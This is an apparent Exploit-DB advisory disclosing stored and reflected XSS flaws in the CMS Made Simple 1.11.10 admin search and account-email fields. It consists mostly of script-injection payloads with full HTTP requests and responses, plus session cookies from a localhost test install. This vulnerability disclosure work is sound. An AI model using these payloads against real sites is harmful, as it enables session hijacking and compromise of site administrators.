CMS Made Simple 1.11.10 - Multiple Cross-Site Scripting Vulnerabilities

EDB-ID:

32668

CVE:


EDB Verified:

Author:

Blessen Thomas

Type:

webapps

Exploit:   /  

Platform:

PHP

Date:

2014-04-03

Vulnerable App: 
Exploit Title : CMS Made Simple 1.11.10 Multiple XSS Vulnerability

Google dork : N/A

Date : 02/04/2014

Exploit Author : Blessen Thomas

Vendor Homepage : http://www.cmsmadesimple.org/

Software Link : N/A

Version : 1.11.10

Tested on : Windows 7 hosted in WAMP server

Type of Application :  open source content management system,





Stored XSS :

Login to the admin portal and access search functionality

http://localhost/cmsmadesimple-1.11.10-full/index.php

Here the " search " parameter is vulnerable to stored xss.

Payload :

'">><marquee><img src=x onerror=confirm(1)

request:

POST http://localhost/cmsmadesimple-1.11.10-full/ HTTP/1.1

Host: localhost User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:28.0)
Gecko/20100101 Firefox/28.0 Accept:
text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-US,en;q=0.5 Accept-Encoding: gzip, deflate Referer:
http://localhost/cmsmadesimple-1.11.10-full/index.php Cookie:
_sx_=3ee623ee0900c03b; cms_admin_user_id=1;
cms_passhash=fcb88b76587f0658cd2481a004312918;
CMSSESSIDd508249c=qijlp266idmf9sjc51bai74lg7;
PHPSESSID=5fvasiledip329l0bhr2ulb1j0;
CMSSESSID7a29d042=qv3lpa3fpdflsmqac1icp5cfe7 Connection: keep-alive
Content-Type: application/x-www-form-urlencoded Content-Length: 153

mact=Search%2Ccntnt01%2Cdosearch%2C0&cntnt01returnid=15&cntnt01searchinput=%27%22%3E%3E%3Cmarquee%3E%3Cimg+src%3Dx+onerror%3Dconfirm%281%29&submit=Submit

response :


<div id="search" class="core-float-right">
            '">><marquee><img src=x onerror=confirm(1)
          </div>
             <a href="http://localhost/cmsmadesimple-1.11.10-full/"
title="Home Page, shortcut key=1" >CMS Made Simple Site</a>
</div>





Reflected XSS :

Login to the admin portal and click the "My Preferences" and click "My
account" section.

Here , the "email address" parameter is vulnerable to reflected XSS.

Payload :

"";</script><script>alert(0)</script><"

request :

POST
http://127.0.0.1/cmsmadesimple-1.11.10-full/admin/myaccount.php?_sx_=1c8c76366630b299
HTTP/1.1

Host: 127.0.0.1 User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:28.0)
Gecko/20100101 Firefox/28.0 Accept:
text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-US,en;q=0.5 Accept-Encoding: gzip, deflate Referer:
http://127.0.0.1/cmsmadesimple-1.11.10-full/admin/myaccount.php?_sx_=1c8c76366630b299Cookie:
_sx_=1c8c76366630b299; cms_admin_user_id=1;
cms_passhash=fcb88b76587f0658cd2481a004312918;
CMSSESSIDd508249c=71ougg9mi3ikiilatfc0851no5 Connection: keep-alive
Content-Type: application/x-www-form-urlencoded Content-Length: 103

active_tab=maintab&user=test&password=&passwordagain=&firstname=&lastname=&email="";</script><script>alert(0)</script><"&submit_account=Submit


response :

</aside>	 </div>	 <!-- end sidebar //-->	 <!-- start main
-->	 <div id="oe_mainarea" class="cf">	 <aside class="message
pageerrorcontainer" role="alert"><p>The email address entered is
invalid: "";</script><script>alert(0)</script><"</p></aside><article
role="main" class="content-inner"><header class="pageheader
cf"><h1>My&nbsp;Account</h1><script type="text/javascript">
Tags:
Advisory/Source: Link
Databases Links Sites Solutions
Exploits Search Exploit-DB OffSec Courses and Certifications
Google Hacking Submit Entry Kali Linux Learn Subscriptions
Papers SearchSploit Manual VulnHub OffSec Cyber Range
Shellcodes Exploit Statistics Proving Grounds
Penetration Testing Services
Exploits Google Hacking Papers Shellcodes
Search Exploit-DB Submit Entry SearchSploit Manual Exploit Statistics
OffSec Kali Linux VulnHub
Courses and Certifications Learn Subscriptions OffSec Cyber Range Proving Grounds Penetration Testing Services